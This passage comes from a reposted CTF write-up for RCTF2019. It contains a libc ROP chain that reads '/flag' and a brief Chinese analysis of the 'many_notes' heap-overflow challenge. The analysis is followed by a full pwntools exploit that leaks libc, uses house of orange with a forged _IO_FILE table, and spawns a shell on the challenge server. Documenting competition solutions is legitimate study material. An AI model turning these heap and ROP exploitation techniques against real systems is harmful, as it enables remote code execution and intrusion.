p64(buf_addr) # @ .data p += p64(0x0000000000033544+libc.address) # pop rax ; ret p += '/flag'.ljust(8,'x00') p += p64(0x000000000007783a+libc.address) # mov qword ptr [rsi], rax ; ret p += p64(0x0000000000021102+libc.address) # pop rdi ; ret p += p64(buf_addr) # @ .data p += p64(0x00000000000202e8+libc.address) # pop rsi ; ret p += p64(0) # rsi = 0 p += p64(0x000000000008b8c5+libc.address) # xor rax, rax ; ret p += p64(0x00000000000abf40+libc.address) # add rax, 1 ; ret p += p64(0x00000000000abf40+libc.address) # add rax, 1 ; ret p += p64(0x00000000000bc375+libc.address) # syscall ; ret # read(fd, buf_addr+8, 0x100) # p += p64(0x000000000044fd9f) # xchg eax, ebp ; ret p += p64(0x00000000000202e8+libc.address) # pop rsi ; ret p += p64(buf_addr+0x30) # @ .data + fd p += p64(0x000000000007783a+libc.address) # mov qword ptr [rsi], rax ; ret p += p64(0x0000000000001b92+libc.address) # pop rdx ; ret p += p64(buf_addr+0x30) # @ .data + fd p += p64(0x00000000001840e6+libc.address) # mov edi, dword ptr [rdx] ; ret p += p64(0x00000000000202e8+libc.address) # pop rsi ; ret p += p64(buf_addr+8) # @ .data + 8 p += p64(0x0000000000001b92+libc.address) # pop rdx ; ret p += p64(0x100) # 0x100 p += p64(0x000000000008b8c5+libc.address) # xor rax, rax ; ret p += p64(0x00000000000bc375+libc.address) # syscall ; ret # write(1, buf_addr+8, 0x100) p += p64(0x0000000000021102+libc.address) # pop rdi ; ret p += p64(1) # stdout p += p64(0x00000000000202e8+libc.address) # pop rsi ; ret p += p64(buf_addr+8) # @ .data + 8 p += p64(0x0000000000001b92+libc.address) # pop rdx ; ret p += p64(0x100) # 0x100 p += p64(0x000000000008b8c5+libc.address) # xor rax, rax ; ret p += p64(0x00000000000abf40+libc.address) # add rax, 1 ; ret p += p64(0x00000000000bc375+libc.address) # syscall ; ret payload += p # gdb.attach(r,"b *0x00005555555551E7") edit(0,payload) r.interactive()
many_notes
分析
- 输入username长度为8是可以泄露libc地址
- 在read函数中,输入content的时候,循环中的size大小不变,有堆溢出漏洞
- 线程thread_arena分配的堆块原理与main_arena大致一样
- 通过不停分配堆块,类似于house of orange,最后top chunk不够分配的内存会被free掉进入unsortbin
- 从unsortbin中new一个新的堆块,并通过堆溢出漏洞修改unsortbin,利用house of orange方法getshell
exp
#!/usr/bin/env python # -*- coding: utf-8 -*- #version 6 by tempo from pwn import * from time import sleep import base64 context(os='linux', arch='amd64') context.log_level = 'debug' IS_DEBUG = 0 prog = './many_notes' def change_ld(binary,ld): if not os.access(ld, os.R_OK): log.failure("Invalid path {} to ld".format(ld)) return None if not isinstance(binary, ELF): if not os.access(binary, os.R_OK): log.failure("Invalid path {} to binary".format(binary)) return None binary = ELF(binary) for segment in binary.segments: if segment.header['p_type'] == 'PT_INTERP': size = segment.header['p_memsz'] addr = segment.header['p_paddr'] data = segment.data() if size <= len(ld): log.failure("Failed to change PT_INTERP from {} to {}".format(data, ld)) return None binary.write(addr, ld.ljust(size, '')) if not os.access('/tmp/pwn', os.F_OK): os.mkdir('/tmp/pwn') path = '/tmp/pwn/{}_debug'.format(os.path.basename(binary.path)) if os.access(path, os.F_OK): os.remove(path) info("Removing exist file {}".format(path)) binary.save(path) os.chmod(path, 0b111000000) #rwx------ success("PT_INTERP has changed from {} to {}. Using temp file {}".format(data, ld, path)) return ELF(path) #example elf = change_ld('./many_notes', './ld-linux-x86-64.so.2') if IS_DEBUG: r = elf.process(env={'LD_PRELOAD':'./libc.so.6:./ld-linux-x86-64.so.2:./libpthread.so.0'}) libc =r.libc # r = process(prog, env={'LD_PRELOAD':'../libc/libc-2.28.so'}) else: r = remote('123.206.174.203', 20003) # r = process('./{}'.format(prog)) libc = ELF('./libc.so.6') def my_u64(byte_arr): padding = b'x00' * (8-len(byte_arr)) res = byte_arr + padding return struct.unpack('<Q', res)[0] def round(size,padding,input,content): r.sendlineafter("Choice","0") r.sendlineafter("Size",str(size)) r.sendlineafter("Padding",str(padding)) r.sendlineafter("Input?",str(input)) if input != 0: r.sendafter("Content",str(content)) r.sendafter("name","a"*8) #可用于泄露程序地址,libc地址,栈地址 0x00007fffffffecc0 r.recvuntil("a"*8) libc.address = u64(r.recv(6).ljust(8,'x00')) -0x7ffff7bb5720+ 0x00007ffff780a000 success(hex(libc.address)) for i in range(0x2fe): round(0x2000,0x1f, 0,'a'*0x2000) round(0x2000,0xe, 0, 'a'*0x2000) # consume freed chunk at the tail of heap_0 round(0x300, 0, 0, '') #剩下0x1e0大小的unsortbin,将以下payload溢出覆盖正常的unsortbin #模板: system_addr = libc.sym['system'] bin_sh_addr = next(libc.search("/bin/sh")) io_list_all = libc.sym['_IO_list_all'] #&_IO_list_all io_str_jump = libc.sym['_IO_file_jumps']+0xc0 #&_IO_str_jumps payload = 'b'*0x10 #需要将(_IO_list_all或_IO_2_1_stderr+0x68_或_IO_2_1_stdout_+0x68或_IO_2_1_stdin_+0x68)的值修改为伪造表的地址或者一个0x68处指向伪造表的指针(如unsortbin攻击),比如将*_IO_list_all修改为a,a的0x68处指针为b,b就是以下payload,为伪造的io_file_plus表 payload += p64(0) + p64(0x61) + p64(0) +p64(io_list_all-0x10) +p64(0)+p64(1)+p64(0) payload += p64(bin_sh_addr) + p64(0)*19 +p64(io_str_jump-8) payload += p64(0) + p64(system_addr)#system调用时会将IO_buf_base设为参数,实现shell #这里的io_list_all-0x10主要是为了利用unsortbin attack,修改_IO_list_all的值为main_arena+0x58,在有任意地址写的能力时,就不需要这么麻烦了。 #payload长度0x100 round(0x100,0, 1, 'a'*0xf0) #剩余0x10 r.send(payload) r.sendlineafter("Choice","0") r.sendlineafter("Size",str(0x10)) r.interactive()
以上所述就是小编给大家介绍的《Gr3yW0lf RCTF2019 Writeup》,希望对大家有所帮助,如果大家有任何疑问请给我留言,小编会及时回复大家的。在此也非常感谢大家对 码农网 的支持!
猜你喜欢:本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们。